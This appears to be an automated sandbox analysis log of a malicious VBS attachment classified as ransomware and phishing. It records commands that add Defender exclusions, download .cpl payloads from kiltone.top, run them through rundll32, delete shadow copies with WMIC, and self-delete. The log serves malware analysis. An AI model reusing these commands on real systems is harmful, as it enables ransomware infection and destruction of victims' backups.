Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fjeljies.cpl 4B4A87552C44158FB53A72C7294319B0DDDE9F99F460425AD5997D3B9121CD1E
Source: NOTIFICATION_OF_DEPENDANTS.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@98/804@7/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9204:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osqxipss.xww.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
